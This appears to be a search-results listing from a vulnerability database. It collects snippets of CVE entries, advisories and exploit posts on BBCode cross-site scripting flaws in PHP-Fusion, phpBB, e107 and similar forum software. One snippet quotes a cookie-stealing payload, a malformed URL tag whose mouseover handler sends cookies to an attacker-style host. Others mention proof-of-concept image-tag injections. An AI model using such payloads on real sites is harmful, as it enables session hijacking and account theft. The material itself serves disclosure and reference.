518 matches found
CVE-2005-2783
CVE-2005-2783 is a cross-site scripting (XSS) vulnerability in PHP-Fusion 6.00.107 and earlier. The issue arises from insufficient sanitization of nested, malformed URL BBCode tags, allowing remote attackers to inject arbitrary script/HTML when a user views a post containing the ...
CVE-2005-2783
Cross-site scripting (XSS) vulnerability in PHP-Fusion 6.00.107 and earlier allows remote attackers to inject arbitrary web script or HTML via nested, malformed URL BBCode tags...
flat256enENa2.txt
Flatnuke 2.5.6 enENa2 possibly prior versions user IP address / information disclosure software: site: http://flatnuke.sourceforge.net/flatnuke/ download link: http://itk.hopto.org:666/work/index.php?mod=Download&dlfile=FlatNukeEn/FlatNukeEn2.5.6a2.zip&mode=go same vuln of simple machine forum,...
PHP-Fusion <= v6.00.107 XSS exploit
Hello, we have found a vulnerability in PHP-Fusion =v6.00.107 which allows us to steal cookies. The exploit works because of badly coded bbcode. Well here is the exploit. URL=http://aaaaaa.com/URurl=aa.com&& OnMouseOver=jscript:location='http://direct/to/cookie/stealer.com/?c='+cookie;...
bbcodeLogout.txt
Hi, Saw this one on www.waraxe.us Discovered by Easyex and I was thinking if there are some more possibilities using the method described. The POC below is for phpBB. - ========== make yourself a folder on your host rename the folder to signature.jpg this will trick bbcode that it's an image file...
[Full-disclosure] BBCode [IMG] [/IMG ] Tag Vulnerability
Hi, Saw this one on www.waraxe.us Discovered by Easyex and I was thinking if there are some more possibilities using the method described. The POC below is for phpBB. - ========== make yourself a folder on your host rename the folder to signature.jpg this will trick bbcode that it's an image file...
PHP-Fusion 6.0.106 - BBCode IMG Tag Script Injection
PHP-Fusion 6.0.106 - BBCode IMG Tag Script Injection / ahh I was hoping for some socket code : /str0ke Dark Assassins - http://dark-assassins.com/ Visit us on IRC @ irc.tddirc.net DarkAssassins PHP-Fusion img/img exploit Discovered/Coded by Easyex Using the img /img codes we can get an...
CVE-2005-2438
Cross-site scripting (XSS) vulnerability in UseBB 0.5.1 and earlier allows remote attackers to inject arbitrary Javascript via the BBCode color value...
CVE-2005-2401
PHP-Fusion is affected by CVE-2005-2401: remote attackers can inject arbitrary CSS through the BBCode color tag in posts. The related Nessus plugin and CVE records indicate this affects PHP-Fusion builds around the 6.0x line (e.g.,
[SA16149] phpBB BBcode "url" Script Insertion Vulnerability
---------------------------------------------------------------------- Are you interested in a new job in IT security? Secunia has two open positions as Junior and Senior Specialist in IT security: http://secunia.com/secuniavacancies/...
CVE-2005-2327
The CVE-2005-2327 entry describes a Cross-site scripting (XSS) vulnerability in the e107 content management system, affecting version 0.617 and earlier. The root cause is input handling that allows nested [url] BBCode tags to be processed in a way that enables remote injection of arbitrary script...
CVE-2005-2327
Cross-site scripting (XSS) vulnerability in e107 0.617 and earlier allows remote attackers to inject arbitrary web script or HTML via nested [url] BBCode tags...
phpBB < 2.0.17 Nested BBCode URL Tags XSS
Binary data 3051.prm...
GLSA-200505-10 : phpBB: XSS Vulnerability
The remote host is affected by the vulnerability described in GLSA-200505-10 phpBB: XSS Vulnerability phpBB is vulnerable to a cross-site scripting vulnerability due to improper sanitization of user-supplied input. Coupled with poor validation of BBCode URLs which may be included in a forum post,...
CVE-2005-1193
The bbencode_second_pass and make_clickable functions in bbcode.php for phpBB before 2.0.15, as used in viewtopic.php, privmsg.php, and other scripts, allow remote attackers to execute arbitrary script via a BBcode tag with a (1) javascript:, (2) applet:, (3) about:, (4) activex:, (5) chrome:, or (6) script: UR...
CVE-2005-1193
The CVE-2005-1193 vulnerability affects phpBB up to version 2.0.14 (before 2.0.15). The bbencode_second_pass and make_clickable functions in bbcode.php fail to filter BBCode URLs, allowing remote attackers to execute arbitrary script via URL schemes such as javascript:, applet:, about:, activex:,...
phpBB: Cross-Site Scripting Vulnerability
Background phpBB is an Open Source bulletin board package. Description phpBB is vulnerable to a cross-site scripting vulnerability due to improper sanitization of user supplied input. Coupled with poor validation of BBCode URLs which may be included in a forum post, an unsuspecting user may follo...
CVE-2004-2038
Cross-site scripting (XSS) vulnerability in Land Down Under (LDU) before LDU 700 allows remote attackers to inject arbitrary web script or HTML via a BBcode img tag in (1) functions.php, (2) header.php or (3) auth.inc.php...